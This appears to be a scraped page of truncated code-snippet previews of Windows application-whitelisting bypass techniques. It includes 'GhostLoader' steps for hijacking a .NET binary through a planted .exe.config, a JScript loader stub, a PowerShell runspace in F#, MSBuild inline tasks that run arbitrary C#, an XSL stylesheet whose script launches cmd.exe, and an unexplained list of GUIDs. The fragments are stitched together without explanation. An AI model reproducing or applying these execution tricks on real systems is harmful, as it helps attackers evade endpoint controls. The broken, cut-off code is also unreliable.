GhostLoader Steps :)
1. Create C:\Tools
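2. Copy any .NET binary to C:\Tools
3. This example uses FileHistory.exe, but any .NET application will do.
4. Ensure FileHistory.exe.config is in the same directory as FileHistory.exe (a .NET binary copied into a newly created directory with a .exe.config placed beside it is the on-disk artifact these steps leave for a defender to look for)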
5. Execute C:\Tools\FileHistory.exe
[JS File] | |
function setversion() { | |
} | |
function debug(s) {} | |
function base64ToStream(b) { | |
var enc = new ActiveXObject("System.Text.ASCIIEncoding"); | |
var length = enc.GetByteCount_2(b); | |
var ba = enc.GetBytes_4(b); |
#r @"C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" | |
open System.Management.Automation | |
open System.Management.Automation.Runspaces | |
open System | |
let runSpace = RunspaceFactory.CreateRunspace() | |
runSpace.Open() | |
let pipeline = runSpace.CreatePipeline() |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy any .NET binary to C:\Tools
3. This example uses FileHistory.exe, but any .NET application will do.
4. Ensure FileHistory.exe.config is in the same directory as FileHistory.exe
5. Execute C:\Tools\FileHistory.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
<Target Name="Hello" > | |
<!-- Call ANY .NET API --> | |
<!-- | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
041e868e-0c7d-48c6-965f-5fd576530e5b | |
0438c02b-eb9c-4e42-81ad-407f6cd6cde1 | |
078b1f7d-c34c-4b13-a7c3-9663901650f1 | |
0abb2961-2cc1-4f1d-be8e-9d330d06b77d | |
0d7237e6-930f-4682-ad0a-52ebffd3aee3 | |
0d972387-817b-46e7-913f-e9993ff401eb | |
0e770b12-7221-4a5d-86ee-77310a5506bb | |
0fa57208-5100-4cd6-955c-fe69f8898973 | |
1080a020-2b47-4da9-8095-dbc9cefffc04 | |
10cf2e12-1681-4c53-adc0-932c84832cd8 |
<?xml version='1.0'?> | |
<stylesheet | |
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt" | |
xmlns:user="placeholder" | |
version="1.0"> | |
<output method="text"/> | |
<ms:script implements-prefix="user" language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); | |
]]> </ms:script> |
using System; | |
using System.Diagnostics; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
public class TestClass | |
{ | |
public TestClass() | |
{} |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- This inline task executes c# code. --> | |
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe powaShell.csproj --> | |
<Target Name="Hello"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > |